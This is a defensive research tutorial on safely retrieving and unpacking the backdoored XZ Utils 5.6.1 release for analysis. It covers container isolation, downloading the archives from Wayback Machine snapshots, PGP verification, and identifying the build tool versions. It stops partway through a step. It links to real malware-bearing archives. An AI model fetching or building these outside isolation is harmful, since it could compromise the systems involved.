# How to extract the XZ backdoor malware payload
Documents reproducible step-by-step progress to safely extract the
malware payload from the tainted XZ Utils release tarball.
<https://hackmd.io/@cve-2024-3094/how-to-extract-the-malware-payload>
## Table of contents
[TOC]
## Prerequisites
The following conditions must be met in order to run this tutorial:
* A host machine has any of the virtualization solutions ready:
+ A container runtime (e.g. [Docker Engine](https://docs.docker.com/engine/) or Podman)
+ A virtual machine hypervisor (e.g.
QEMU-KVM, Oracle VirtualBox, or VMware Player/Workstation)
* Internet access is available in the host machine.
In this tutorial the Docker container runtime is used, though other virtualization solutions may be used with minor modifications to the process.
Note that the command examples in the following sections assume that
you're using a Bash shell; you may need to translate them to the
equivalent variants for your specific shell when running them.
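You can quickly check whether your current shell is Bash with the following snippet (a small sketch; non-Bash shells won't have the `BASH_VERSION` variable set):

```bash
# Print the running shell's Bash version if available; other
# shells won't have the BASH_VERSION variable set
if [ -n "${BASH_VERSION-}" ]; then
    printf 'Running GNU Bash %s\n' "${BASH_VERSION}"
else
    printf 'Not running GNU Bash, adapt the commands accordingly\n' >&2
fi
```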
## Reproducible environment
The following environment was used to reproduce this tutorial during
the writing process:
### Host operating system
Ubuntu 24.04
### Guest operating system (to actually do the extraction)
Ubuntu 22.04
### Docker Engine
24.0.5
## Launch a text terminal emulator application
Most of the following steps must be executed in a text terminal;
launch your preferred text terminal emulator application to do so.
## Create a working directory for this specific tutorial
To avoid accidentally using the tainted software, we should store all
files that may be malicious in a dedicated folder (in particular, not
your Downloads folder).
Use your preferred file manager application or run the following shell
command to do so:
```bash
mkdir '/path/to/the/hosting/dir/CVE-2024-3094 vulnerability research'
```
## Switch to the working directory
Run the following command to switch your working directory, minimizing
the keystrokes required to refer to files in that directory:
```bash
cd '/path/to/the/hosting/dir/CVE-2024-3094 vulnerability research'
```
## Fetch the Ubuntu 22.04 Docker container image from the container registry
To reduce the time required for the [Update the container system to avoid zero-day exploits](#Update-the-container-system-to-avoid-zero-day-exploits) step during each tutorial reproduction session, fetch the latest Ubuntu 22.04 container image from the Docker registry by running the following command _as root_:
```bash
docker pull ubuntu:22.04
```
The command should produce output similar to one of the following, depending on whether you already have the latest specified container image downloaded to your local host:
```output
22.04: Pulling from library/ubuntu
062e51aa1fb4: Pull complete
Digest: sha256:5cd569b792a8b7b483d90942381cd7e0b03f0a15520d6e23fb7a1464a25a71b1
Status: Downloaded newer image for ubuntu:22.04
docker.io/library/ubuntu:22.04
```
```output
22.04: Pulling from library/ubuntu
Digest: sha256:77906da86b60585ce12215807090eb327e7386c8fafb5402369e421f44eff17e
Status: Image is up to date for ubuntu:22.04
docker.io/library/ubuntu:22.04
```
:::info
**Note:**
If you are in a networking environment where Internet access is only available through a specific HTTP/HTTPS proxy service, you need to merge the following JSON dictionary keys and values into your Docker daemon configuration file (typically `/etc/docker/daemon.json`):
```json
{
"proxies": {
"http-proxy": "_http_proxy_url_",
"https-proxy": "_https_proxy_url_",
"no-proxy": "*.local,127.0.0.0/8,192.168.0.0/16,10.0.0.0/8,172.16.0.0/12"
}
}
```
and restart the Docker daemon for the configuration change to take effect. Refer to the [Configure Docker to use a proxy server | Docker Docs](https://docs.docker.com/network/proxy/) official documentation for more information.
:::
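As a sketch of applying the note above (assuming you have no existing daemon configuration file whose keys would need merging; the `proxy.example.com` URLs are placeholders for your actual proxy service), you can first write the configuration to a local file for review:

```bash
# Write the proxy configuration to a local daemon.json file for
# review; the proxy URLs below are placeholder values
cat >daemon.json <<'EOF'
{
    "proxies": {
        "http-proxy": "http://proxy.example.com:3128",
        "https-proxy": "http://proxy.example.com:3128",
        "no-proxy": "*.local,127.0.0.0/8,192.168.0.0/16,10.0.0.0/8,172.16.0.0/12"
    }
}
EOF
```

After reviewing the file, copy it to `/etc/docker/daemon.json` _as root_ and restart the Docker daemon (e.g. via `systemctl restart docker`).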
## Launch a Docker container to avoid accidentally compromising the system used to inspect the malicious payload
:::danger
**Security implications:**
It would be even safer to create a virtual machine for this case, as the isolation between the guest and the host system is stronger.
Even that isn't 100% safe though, given that [virtual machine escape exploits still exist](https://en.wikipedia.org/wiki/Virtual_machine_escape). Doing the work on another non-critical host machine with a likely malware-incompatible CPU architecture (like ARM or RISC-V) would be your safest bet.
:::
Run the following commands _as root_ to launch an ephemeral Docker container for the inspection of the malicious payload:
```bash
docker_run_opts=(
# Destroy the container after exiting the run session
--rm
# Allow the interactive Bash shell to run properly
--interactive
--tty
# Mount the working directory under the /project directory
# in the container for easy access to the tainted XZ Utils
# files via the bind-mount Docker volume mechanism
--mount "type=bind,source=${PWD},destination=/project"
# Configure host-facing human-readable container name
--name cve-2024-3094
# Configure guest-facing human-readable container name
# This is to prevent accidental out-of-scope usage of
# this container, which should only be used in the scope
# of this tutorial
--hostname cve-2024-3094
# Configure a custom DNS server instead of what the host is
# currently using to avoid disclosing such info to the malware
# 1.1.1.1 is a public DNS service hosted by Cloudflare
--dns 1.1.1.1
)
docker run "${docker_run_opts[@]}" ubuntu:22.04
```
:::info
**Note:**
* The `array=(...)` command uses [the GNU Bash shell scripting language's indexed array assignment syntax](https://www.gnu.org/software/bash/manual/html_node/Arrays.html); the above command example uses this notation to add descriptive comments for the command-line options and their arguments.
* The `"${array[@]}"` notation is [one of the Bash scripting language's parameter expansion syntaxes](https://www.gnu.org/software/bash/manual/html_node/Shell-Parameter-Expansion.html), which is replaced *by each of the double-quoted array members, separated by a space character* after expansion. You can prepend the `echo` command before the command containing such notation (e.g. `echo "${array[@]}"`) to preview the expanded result.
:::
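For example, the following snippet (with hypothetical option names for illustration) previews how an option array expands into separate command-line words:

```bash
# Build a small option array and preview its expansion; each
# double-quoted array member becomes one word on the command line
example_opts=(
    --follow
    --lines 10
)
echo "${example_opts[@]}"
# Output: --follow --lines 10
```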
:::info
**Note:**
If you're in a network environment where Internet access is only
available through an HTTP/HTTPS proxy, run the following commands
before the invocation of the `docker run` command:
* `docker_run_opts+=(--env http_proxy=__HTTP_PROXY_URL__)`
* `docker_run_opts+=(--env https_proxy=__HTTPS_PROXY_URL__)`
You may omit the part of the `--env` `docker run` command-line
option's argument *after the equal sign (not including the trailing
closing parenthesis)* if you already have the environment variables set
on your host machine.
:::
:::info
**Note:**
By default the Ubuntu container image has its timezone set to
[Coordinated Universal Time (UTC)](https://en.wikipedia.org/wiki/Coordinated_Universal_Time);
if you're in a different timezone you can run the following command to
fix the timezone settings:
```bash
docker_run_opts+=(--env TZ=_std__offset_)
```
Replace the _std_ placeholder of the `TZ` environment variable's value
with a suitable time zone abbreviation; refer to [List of time zone abbreviations - Wikipedia](https://en.wikipedia.org/wiki/List_of_time_zone_abbreviations)
for the full list, or simply use `LOC` as the abbreviation isn't really
used for anything other than being displayed to the user, so it doesn't
matter much.
Replace the _offset_ placeholder of the `TZ` environment variable's
value with the time value you must add to the local time to get UTC time. It has a `[+|-]hh[:mm[:ss]]` format where the square bracket pairs denote optional fields and the pipe (`|`) character denotes possible alternations; for the `hh`, `mm`, and `ss` fields leading zeros may also be omitted.
For example, for users in Taiwan (UTC+8) a proper `TZ` value would be `CST-8`, as the time zone abbreviation is `CST` and minus 8 hours must be applied to the local time to get the UTC time.
:::
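You can check how a given `TZ` value is interpreted by printing the resulting time zone abbreviation with the `date` command (assuming GNU coreutils `date`, as shipped in the Ubuntu container):

```bash
# Print the abbreviation date derives from the Taiwan example
# value above; this should output "CST"
TZ='CST-8' date +%Z
```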
:::danger
**Security implications:**
You may not need to run the `docker run` command as root if you've set the proper permissions to access the Docker daemon control socket; however, that setup also [has security implications that need to be taken care of](https://docs.docker.com/engine/security/#docker-daemon-attack-surface).
:::
:::warning
**Warning:**
It is recommended to access all data from the potentially evil actor from within the container/virtual machine's isolation from this point on, as such data may contain malicious logic that could compromise your host system.
:::
## (Optional) Switch to use a local Ubuntu software repository mirror service
By default the Ubuntu Docker container image has the `archive.ubuntu.com`
software archive URL configured in the APT software package management
system's software sources list; however, the servers at this address are
located in England and the United States (according to the IP
address geolocation lookup results):
```bash
$ dig +short archive.ubuntu.com @1.1.1.1
91.189.91.83
91.189.91.82
185.125.190.36
91.189.91.81
185.125.190.39
```
![IP address-geolocation lookup result for the "91.189.91.81" IP address, indicate that the server is likely in United States](https://hackmd.io/_uploads/rkhXy5KyA.png "IP address-geolocation lookup result for the \"91.189.91.81\" IP address, indicate that the server is likely in United States")
![IP address-geolocation lookup result for the "185.125.190.36" IP address, indicate that the server is likely in England](https://hackmd.io/_uploads/BkSukqt10.png "IP address-geolocation lookup result for the \"185.125.190.36\" IP address, indicate that the server is likely in England")
...and thus the package download speed will be limited if you don't
live in one of these regions.
To fix this problem we can switch to [your local country representative mirror service](https://wiki.ubuntu.com/Mirrors)
(using the _country_code_.archive.ubuntu.com domain, where
_country_code_ is [an ISO 3166-1 alpha-2 code](https://en.wikipedia.org/wiki/ISO_3166-1_alpha-2#Current_codes))
or [one of your local regular mirror services](https://launchpad.net/ubuntu/+archivemirrors)
of the Ubuntu software repository archives by running the following
commands _as root_:
```bash
read_opts=(
# Specify input prompt to present to the user
-p 'Input the domain name of your local Ubuntu software archive mirror service: '
# Don't allow backslash sequences in the input data to be
# interpreted
-r
)
read "${read_opts[@]}" archive_mirror_domain
# FIXME: The domain name validation regex is not rigorous, considering
# that a domain like 你好.世界 can exist (which it does)
regex_domain_name='^.+\..+$'
if ! [[ "${archive_mirror_domain}" =~ ${regex_domain_name} ]]; then
printf \
'Error: The specified domain name is invalid.\n' \
1>&2
else
now_timestamp="$(date +%Y%m%d-%H%M%S)"
sed_opts=(
# Modify the content of the input file in-place, while creating a
# backup file in order to revert the changes without hassle.
--in-place=".orig.${now_timestamp}"
# Use extended regular expression(E.R.E.) as it is more robust than
# the default basic regular expression(B.R.E.) variant
--regexp-extended
# Apply the sed expression to replace the default software
# repository domain with your local region's Ubuntu software
# archive mirror domain:
# Replace every string that matches the `//[^/]*/ubuntu/` regular
# expression with `//${archive_mirror_domain}/ubuntu/`
--expression="s@//[^/]*/ubuntu/@//${archive_mirror_domain}/ubuntu/@"
)
sed "${sed_opts[@]}" /etc/apt/sources.list
fi
```
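If you'd like to preview the effect of the sed expression before modifying `/etc/apt/sources.list` in place, you can run it against a sample line (the `tw.archive.ubuntu.com` mirror domain here is just an example):

```bash
# Preview the substitution on a sample sources.list line without
# modifying any file; tw.archive.ubuntu.com is just an example
archive_mirror_domain='tw.archive.ubuntu.com'
echo 'deb http://archive.ubuntu.com/ubuntu/ jammy main restricted' \
    | sed --regexp-extended \
        --expression="s@//[^/]*/ubuntu/@//${archive_mirror_domain}/ubuntu/@"
# Output: deb http://tw.archive.ubuntu.com/ubuntu/ jammy main restricted
```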
As the software sources have been modified we need to refresh the APT software package management system's local cache to make the modification effective; running the following command _as root_ should do so:
```bash
apt update
```
## Update the container system to avoid zero-day exploits
As the release archive to inspect is potentially dangerous, we should fully update our container system to reduce the possibility that a zero-day exploit could be used to compromise it (and in turn, our working host system).
Run the following command _as root_ to achieve so:
```bash
apt full-upgrade
```
:::danger
**Security implication:**
Note that the currently running container process (the Bash shell you're pasting commands into) is still *unpatched* and may still be exploited by the attacker; to mitigate this risk, launch a subshell by running the following command:
```bash
bash
```
If you want to skip this mitigation, at least avoid `source`-ing or `.`-ing any scripts or non-script files in the project.
:::
## Change the working directory to the in-container working directory
Run the following command to change the working directory to the bind-mounted working directory:
```bash
cd /project
```
## Retrieve the tainted upstream release archives
The upstream release archives are not accessible right now as GitHub
disabled the access to [the upstream project Git repository](https://github.com/tukaani-project/xz).
![Screenshot of the "This repository has been disabled." error page of the upstream GitHub repository](https://hackmd.io/_uploads/r1y6E4tk0.png "Screenshot of the \"This repository has been disabled.\" error page of the upstream GitHub repository")
Fortunately, with the help of [the Wayback Machine](https://web.archive.org/)
and [some](https://github.com/thesamesam/xz-archive) [other](https://github.com/0xlane/xz-cve-2024-3094)
third-party backups we are still able to retrieve them, as well as the
PGP signatures that can be used to verify their authenticity (to the extent
of an incomplete [PGP web of trust](https://en.wikipedia.org/wiki/Web_of_trust)).
You may locate the files in [the Wayback Machine search results page for the <https://github.com/tukaani-project/xz/releases/download/*> URLs](https://web.archive.org/web/*/https://github.com/tukaani-project/xz/releases/download/*)
and [some](https://github.com/thesamesam/xz-archive) [other](https://github.com/0xlane/xz-cve-2024-3094)
third-party sources, or simply download the files from the following curated
list using your preferred web browser application:
* [https://github.com/tukaani-project/xz/releases/download/v5.6.1/xz-5.6.1.tar.bz2 (from the 2024/3/29 21:54:28 snapshot from the Wayback Machine)](https://web.archive.org/web/20240329215428%2a/https://github.com/tukaani-project/xz/releases/download/v5.6.1/xz-5.6.1.tar.bz2)
* [https://github.com/tukaani-project/xz/releases/download/v5.6.1/xz-5.6.1.tar.bz2.sig (from the 2024/3/29 21:54:30 snapshot from the Wayback Machine)](https://web.archive.org/web/20240329215430%2a/https://github.com/tukaani-project/xz/releases/download/v5.6.1/xz-5.6.1.tar.bz2.sig)
* [https://github.com/tukaani-project/xz/releases/download/v5.6.0/xz-5.6.0.tar.bz2 (from the 2024/3/29 21:54:44 snapshot from the Wayback Machine)](https://web.archive.org/web/20240329215444%2a/https://github.com/tukaani-project/xz/releases/download/v5.6.0/xz-5.6.0.tar.bz2)
* [https://github.com/tukaani-project/xz/releases/download/v5.6.0/xz-5.6.0.tar.bz2.sig (from the 2024/3/29 21:54:45 snapshot from the Wayback Machine)](https://web.archive.org/web/20240329215445%2a/https://github.com/tukaani-project/xz/releases/download/v5.6.0/xz-5.6.0.tar.bz2.sig)
:::info
**Note:**
* We specifically choose NOT to use the **XZ-compressed archive
format variants** of the XZ Utils release archives, as the evil actor
definitely has a deeper understanding of the XZ compression format, to
the extent that they may (in highly unlikely circumstances) have
crafted the release archive in a way that *triggers an unknown
vulnerability when one tries to extract it*.
* Choose the earliest archived version in the Wayback Machine snapshot
selection interface (the calendar view), as later snapshots may not be
the original files.
:::
## Verify the authenticity of the tainted XZ Utils release archive
As the XZ Utils release archives fetched from the Wayback Machine and other backup sources aren't necessarily unmodified, or even released by the evil actor themselves, we must verify their authenticity.
We can achieve this by using the [Pretty Good Privacy (PGP)](https://en.wikipedia.org/wiki/Pretty_Good_Privacy) public key of the evil actor as well as the PGP signature files distributed along with the release archives.
### Install the runtime dependencies required for verifying a PGP-signed document
First, we need to install the software required for verifying PGP-signed documents. [The GNU Privacy Guard (GnuPG)](https://gnupg.org/) is the implementation mainly used on GNU+Linux operating systems; install it by running the following command _as root_:
```bash
apt install gnupg
```
### Fetch a copy of the potential evil actor's PGP public key
We also need to have a copy of the PGP public key of the evil actor, which can be obtained from [the Wayback Machine](https://web.archive.org/web/20240119212247/https://xz.tukaani.org/keys/jia_tan_pubkey.txt).
Simply copy the entire `-----*PUBLIC KEY BLOCK-----` block (including the beginning and ending marker lines) and save the content to a new file named "potential-evil-actor.pubkey" in the working directory using a plaintext editor.
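If you've saved the whole page to a file instead, the following sketch (with a stand-in example file) shows how to extract just the key block using sed's range addressing:

```bash
# Demonstration input standing in for the saved key page; replace
# it with the file you actually saved from the Wayback Machine
cat >pubkey-page-example.txt <<'EOF'
Some surrounding page text
-----BEGIN PGP PUBLIC KEY BLOCK-----
(key data lines)
-----END PGP PUBLIC KEY BLOCK-----
More surrounding page text
EOF
# Print only the lines between the key block markers (inclusive),
# discarding the surrounding page content
sed --quiet \
    '/^-----BEGIN PGP PUBLIC KEY BLOCK-----$/,/^-----END PGP PUBLIC KEY BLOCK-----$/p' \
    pubkey-page-example.txt
```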
### Import the evil actor's PGP public key to the GnuPG keyring
To verify documents signed with PGP we must first import the evil actor's PGP public key into the GnuPG keyring; running the following command will do so:
```bash
gpg_opts=(
# Import the specified PGP public key into your default keyring
--import
)
gpg "${gpg_opts[@]}" potential-evil-actor.pubkey
```
The following output should be displayed:
```output
gpg: key 59FCF207FEA7F445: 1 signature not checked due to a missing key
gpg: /root/.gnupg/trustdb.gpg: trustdb created
gpg: key 59FCF207FEA7F445: public key "Jia Tan <jiat0218@gmail.com>" imported
gpg: Total number processed: 1
gpg: imported: 1
gpg: no ultimately trusted keys found
```
:::info
**Note:**
* The `gpg: key 59FCF207FEA7F445: 1 signature not checked due to a missing key` warning message is due to the fact that the public key of the unknown person who signed the evil actor's PGP keypair is not in your keyring, which is expected as your keyring did not exist in the first place.
* The `gpg: no ultimately trusted keys found` warning message is due to the fact that [the PGP web of trust](https://en.wikipedia.org/wiki/Web_of_trust) is missing for this particular public key. This is expected: the web of trust requires that you have your own private/public key pair and have signed (trusted) either the evil actor's keypair, or other people's keypairs who (directly or indirectly) have signed the evil actor's keypair, which is not the case here. How to satisfy such a trust model to get rid of the warning is, however, out of the scope of this tutorial.
:::
### Verify the authenticity of the PGP-signed XZ Utils release archive
Run the following command to verify the release archive's authenticity:
```bash
gpg_opts=(
# Verify the authenticity of the xz-5.6.1.tar.bz2 file using the
# detached PGP signature file xz-5.6.1.tar.bz2.sig(and the signer's
# PGP public key in your keyring)
--verify xz-5.6.1.tar.bz2.sig xz-5.6.1.tar.bz2
)
gpg "${gpg_opts[@]}"
```
The following output should be displayed:
```output
gpg: Signature made Sat Mar 9 08:22:45 2024 UTC
gpg: using RSA key 22D465F2B4C173803B20C6DE59FCF207FEA7F445
gpg: Good signature from "Jia Tan <jiat0218@gmail.com>" [unknown]
gpg: WARNING: This key is not certified with a trusted signature!
gpg: There is no indication that the signature belongs to the owner.
Primary key fingerprint: 22D4 65F2 B4C1 7380 3B20 C6DE 59FC F207 FEA7 F445
```
:::info
**Note:**
* The `gpg: Good signature from "_display_name_ <_email_address_>..."` output indicates that the PGP-signed file is successfully verified. The `[unknown]` part at the end of that line indicates that the trustworthiness of the keypair that signed the file is determined to be "unknown" according to [the PGP web of trust](https://en.wikipedia.org/wiki/Web_of_trust).
* The `WARNING: This key is not certified with a trusted signature! There is no indication that the signature belongs to the owner.` warning message is due to the fact that [the PGP web of trust](https://en.wikipedia.org/wiki/Web_of_trust) is missing for the evil actor's public key; refer to the `gpg: no ultimately trusted keys found` warning message note above for more info.
:::
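Note that the `using RSA key 22D465F2B4C173803B20C6DE59FCF207FEA7F445` line and the `Primary key fingerprint:` line carry the same 40 hexadecimal digits; you can reformat the compact form into the spaced display groups to compare them by eye:

```bash
# Split the 40-hex-digit fingerprint into ten 4-digit groups,
# matching the "Primary key fingerprint:" display format
printf '%s\n' 22D465F2B4C173803B20C6DE59FCF207FEA7F445 \
    | fold --width=4 \
    | paste --serial --delimiters=' '
# Output: 22D4 65F2 B4C1 7380 3B20 C6DE 59FC F207 FEA7 F445
```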
Now we know that the release archive is indeed signed by the potential evil actor, so the result of the further extraction process should be reproducible by everyone, as long as they retrieve the same file.
## Install the software needed for extracting the tainted XZ Utils release archive
Now we shall extract the tainted XZ Utils release archive. According to the `.tar.bz2` filename extension, the release archive is a bzip2-compressed tarball; you can run the following command *as root* to install the software needed for extracting such files:
```bash
bzip_tarball_extraction_dependency_pkgs=(
# For uncompressing the bzip2 compressed file
bzip2
# For extracting the plain tar archive file
tar
)
apt install "${bzip_tarball_extraction_dependency_pkgs[@]}"
```
## Extract the tainted XZ Utils release archive
Run the following command to extract the XZ Utils release archive:
```bash
tar_opts=(
# Specify to uncompress and extract the specified archive
--extract
--file xz-5.6.1.tar.bz2
)
tar "${tar_opts[@]}"
```
:::warning
**Note:**
It is recommended to use in-container utilities to inspect the files from the potential evil actor, as you may otherwise unintentionally run the programs inside the archive (via the GUI double-click mechanism) or have your system compromised through an exploited vulnerability in one of your host system's components.
:::
## Clone the upstream project's Git repository to the local host
We can rebuild the unmodified build system files from the source tree checked out from [the upstream Git repository](https://git.tukaani.org/?p=xz.git) to compare against what the evil actor actually did to the files.
The first step is to install [the Git version control system software](https://git-scm.com/); you can run the following command _as root_ to do so:
```bash
apt install git
```
then run the following command to clone [the upstream Git repository](https://git.tukaani.org/?p=xz.git) to the local host and check out the 5.6.1 version from it:
```bash
git_clone_opts=(
# Limit the history to fetch only 1 commit to conserve
# storage space, Internet data usage, and fetch time
--depth=1
# Check out the v5.6.1 tag only
--branch v5.6.1
)
git clone "${git_clone_opts[@]}" \
https://git.tukaani.org/xz.git \
xz-git
```
Let's change the working directory back to the initial one, as we no longer need to perform Git operations:
```bash
cd /project
```
## Read the XZ Utils installation document
Now we can read the installation document (INSTALL) in the XZ Utils source tree; however, we need a pager utility to do so. As the pager utility available in the Ubuntu container by default is `more`, which is limited in browsing features (e.g. no page-up), let's install the more capable `less` pager by running the following command _as root_:
```bash
apt install less
```
:::danger
**Security implication:**
Never use the `cat` command to read a file: the file may contain escape sequences that may be interpreted by your terminal, which [may have unintended or even malicious results](https://twitter.com/0xAsm0d3us/status/1774534241084445020). Use a pager utility (e.g. `less`) to mitigate such risks.
:::
Then we can read [the installation document in the XZ Utils source tree](https://git.tukaani.org/?p=xz.git;a=blob;f=INSTALL;h=624a107;hb=fd1b975) by running the following command:
```bash
less xz-git/INSTALL
```
:::info
**Note:**
Press the `q` key on your keyboard to leave the `less` pager program.
:::
## Determine the software used to generate the build system files
According to [the Preface section of the XZ Utils installation document](https://git.tukaani.org/?p=xz.git;a=blob;f=INSTALL;h=6a990ef275ae2567439ee128faa48b04e2b3451f;hb=HEAD#l37), XZ Utils uses [the GNU build system](https://www.gnu.org/software/automake/manual/html_node/GNU-Build-System.html) to build the software, which may include the following software components (among others):
* [GNU Autoconf](https://www.gnu.org/software/autoconf/)
For automatically generating a build configuration program suitable for usage in many processor architectures and operating systems.
* [GNU Automake](https://www.gnu.org/software/automake/)
A tool for automatically generating `Makefile.in` files compliant with the GNU Coding Standards.
* [GNU Libtool](https://www.gnu.org/software/libtool/)
For hiding the complexity of using shared libraries behind a consistent, portable interface.
(The XZ Utils software also supports [the CMake build system](https://cmake.org/) as an alternative build system; however, since the malware injection was not made into that portion, it is out of the scope of this tutorial.)
It would be more helpful to generate the build system files using the *exact* same software versions the evil actor did, as that will introduce less noise during the content comparison operation (to figure out what the evil actor actually did to inject the malicious code).
We can determine the version of the GNU Autoconf build tool used by the software (assuming it was not obfuscated by the evil actor) by checking the heading comment of the build configuration program in the released source code, running the following command:
```bash
head_opts=(
# Only show 3 lines instead of the default 10
--lines=3
)
head "${head_opts[@]}" xz-5.6.1/configure
```
which should produce the following output, indicating that the Autoconf version used for generating the build files is likely **2.72**:
```output
#! /bin/sh
# Guess values for system-dependent variables and create Makefiles.
# Generated by GNU Autoconf 2.72 for XZ Utils 5.6.1.
```
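If you prefer to extract just the version number programmatically, here is a sketch (the sample line below stands in for the real `xz-5.6.1/configure` header; the same approach works for the Automake and Libtool headers with an adjusted pattern):

```bash
# Capture the version number from an Autoconf-generated comment
# line; in practice, run the sed command against the configure
# script itself instead of the echoed sample line
echo '# Generated by GNU Autoconf 2.72 for XZ Utils 5.6.1.' \
    | sed --quiet --regexp-extended \
        --expression='s/^# Generated by GNU Autoconf ([0-9.]+) .*$/\1/p'
# Output: 2.72
```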
We can determine the version of the GNU Automake build tool used by the software (assuming it was not obfuscated by the evil actor) by checking the heading comment of the Makefile input file in the released source code, running the following command:
```bash
head_opts=(
# Only show 3 lines instead of the default 10
--lines=3
)
head "${head_opts[@]}" xz-5.6.1/Makefile.in
```
which should produce the following output, indicating that the Automake version used for generating the build files is likely **1.16.5**:
```output
# Makefile.in generated by automake 1.16.5 from Makefile.am.
# @configure_input@
```
We can determine the version of GNU Libtool used by the software (assuming it was not obfuscated by the evil actor) by checking the heading comment of the build-aux/ltmain.sh file in the released source code, running the following command:
```bash
head_opts=(
# Only show 5 lines instead of the default 10
--lines=5
)
head "${head_opts[@]}" xz-5.6.1/build-aux/ltmain.sh
```
which should produce the following output, indicating that the GNU Libtool version used for generating the build files is likely **a modified version of 2.4.7.4 (with the revision fingerprint 1ec8f)**:
```output
#! /usr/bin/env sh
## DO NOT EDIT - This file generated from ./build-aux/ltmain.in
## by inline-source v2019-02-19.15
# libtool (GNU libtool) 2.4.7.4-1ec8f-dirty
```
After checking [the revision history of the GNU Libtool project](https://git.savannah.gnu.org/cgit/libtool.git/log/) you can see that the actual version is the fourth revision beyond the 2.4.7 version tag (as the commit hash (1ec8f) matches). The `-dirty` version string suffix indicates that the Libtool source may have additional unknown changes that deviate it from the 1ec8f revision.
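The components of that version string can be split apart in the shell, for example (a sketch):

```bash
# Split the Libtool version string into the version number (whose
# last component counts commits beyond the 2.4.7 tag), the
# abbreviated commit hash, and the dirty-tree marker
version_string='2.4.7.4-1ec8f-dirty'
IFS='-' read -r version commit_hash dirty_flag <<<"${version_string}"
printf 'version=%s hash=%s dirty=%s\n' \
    "${version}" "${commit_hash}" "${dirty_flag}"
# Output: version=2.4.7.4 hash=1ec8f dirty=dirty
```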
Upon inspection of [the configure.ac GNU Autoconf input file](https://git.tukaani.org/?p=xz.git;a=blob;f=configure.ac;h=075567f#l778) we can notice that the XZ Utils software also makes use of the GNU Gettext internationalization (I18N) support library:
```m4
dnl Support for _REQUIRE_VERSION was added in gettext 0.19.6. If both
dnl _REQUIRE_VERSION and _VERSION are present, the _VERSION is ignored.
dnl We use both for compatibility with other programs in the Autotools family.
echo
echo "Initializing gettext:"
AM_GNU_GETTEXT_REQUIRE_VERSION([0.19.6])
AM_GNU_GETTEXT_VERSION([0.19.6])
AM_GNU_GETTEXT([external])
```
As GNU Gettext also generates build system files into the source tree, we must build the exact same GNU Gettext version the potential evil actor used as well, which can be found by inspecting the header of the xz-5.6.1/m4/gettext.m4 file, running the following command:
```bash
head_opts=(
# Only show 1 line instead of the default 10
--lines=1
)
head "${head_opts[@]}" xz-5.6.1/m4/gettext.m4
```
According to the following output, the GNU Gettext version used to build XZ Utils 5.6.1 seems to be **0.22.4**:
```output
# gettext.m4 serial 78 (gettext-0.22.4)
```
## Install the software dependencies to generate the build system files
While the Ubuntu software distribution may provide these software packages in the required versions, they may also introduce additional changes of their own that would complicate the difference comparison process, so we'll have to build and install this software from the source code manually.
### GNU Autoconf
The installation of the GNU Autoconf software can be done by following [the Downloading Autoconf section of the Autoconf project page](https://www.gnu.org/software/autoconf/#downloading) to locate the download URLs of [the 2.72 release archive](http://ftp.gnu.org/gnu/autoconf/autoconf-2.72.tar.xz) and [its respective PGP signature file](http://ftp.gnu.org/gnu/autoconf/autoconf-2.72.tar.xz.sig), then downloading them to the working directory using your web browser.
Then, as usual, verify that the release archive we've downloaded was actually made by the Autoconf project maintainer. We can determine who actually signed the release archive by running the following command:
```bash
gpg_opts=(
# Verify the authenticity of the autoconf-2.72.tar.xz file using the
# detached PGP signature file autoconf-2.72.tar.xz.sig(and the
# signer's PGP public key in your keyring which does not exist at
# the moment)
--verify autoconf-2.72.tar.xz.sig autoconf-2.72.tar.xz
)
gpg "${gpg_opts[@]}"
```
You should see the following error message from GnuPG:
```text
gpg: Signature made Fri Dec 22 19:13:21 2023 UTC
gpg: using RSA key 82F854F3CE73174B8B63174091FCC32B6769AA64
gpg: Can't check signature: No public key
```
The PGP signature can't be checked as we don't have the signer's public key in our PGP keyring; we can retrieve the public key using the key's ID (82F854F3CE73174B8B63174091FCC32B6769AA64) from the previous output by running the following command:
```bash
gpg_opts=(
# Specify the keyserver to fetch the public key from.
#
# GnuPG does have one set by Debian (hkps://keys.openpgp.org),
# however, it didn't work reliably during the writing of this
# tutorial, thus another popular one is used instead.
--keyserver keyserver.ubuntu.com
# Import the keys with the given keyIDs from a keyserver
--receive-keys 0x82F854F3CE73174B8B63174091FCC32B6769AA64
)
gpg "${gpg_opts[@]}"
```
You should see the following command output:
```text
gpg: key 91FCC32B6769AA64: public key "Zack Weinberg <zackw@panix.com>" imported
gpg: Total number processed: 1
gpg: imported: 1
```
which indicates that the one who signed the release is supposed to be Zack Weinberg <<zackw@panix.com>>. According to [the Maintainers section of the Autoconf project page](https://www.gnu.org/software/autoconf/#maintainer) the project maintainers seem to be:
* Paul Eggert
* Eric Blake <<ebb9@byu.net>>
which is weird, as Zack isn't in the list. However, by [checking the summary page of Autoconf's Git repository](https://git.savannah.gnu.org/cgit/autoconf.git) we can verify that it is indeed
Zack Weinberg who prepared the 2.72 release:
![The screenshot of the recent commits of the GNU Autoconf source repository, "Zack Weinberg" is listed to be the author that written the "Finalize NEWS for release 2.72." revision(outlined in red)](https://hackmd.io/_uploads/Hk8opd6kR.png "The screenshot of the recent commits of the GNU Autoconf source repository")
We can now proceed to verify the released GNU Autoconf source archive:
```bash
gpg_opts=(
# Verify the authenticity of the autoconf-2.72.tar.xz file using the
# detached PGP signature file autoconf-2.72.tar.xz.sig(and the
# signer's PGP public key in your keyring)
--verify autoconf-2.72.tar.xz.sig autoconf-2.72.tar.xz
)
gpg "${gpg_opts[@]}"
```
:::info
**Note:**
As mentioned in the [Verify the authenticity of the tainted XZ Utils
release archive](#Verify-the-authenticity-of-the-tainted-XZ-Utils-release-archive)
section, the following output line indicates that the PGP-signed file is
verified successfully:
```text
gpg: Good signature from "DISPLAY NAME <EMAIL-ADDRESS>" [*]
```
:::
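If you'd like a feel for how detached-signature verification behaves end-to-end without touching any real release, here is a self-contained sketch that generates a throwaway key in a temporary keyring (the identity and file names are hypothetical):

```bash
# Use a throwaway keyring directory so we don't touch the real one
export GNUPGHOME="$(mktemp -d)"
# Generate a passphrase-less demo key (hypothetical identity)
gpg --batch --pinentry-mode loopback --passphrase '' \
    --quick-generate-key 'Demo Signer <demo@example.org>' default default never
# Create a file and a detached signature for it
printf 'release payload\n' > demo-release.tar
gpg --batch --pinentry-mode loopback --passphrase '' \
    --detach-sign --output demo-release.tar.sig demo-release.tar
# Verification prints a "Good signature" line when the file matches
gpg --verify demo-release.tar.sig demo-release.tar
```

Tampering with demo-release.tar after signing and re-running the `--verify` step would yield a "BAD signature" error instead.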
We can now proceed to extract the Autoconf source archive, but first we
need to install the (hopefully not malicious :P) XZ Utils software
required to do so. Run the following command _as root_:
```bash
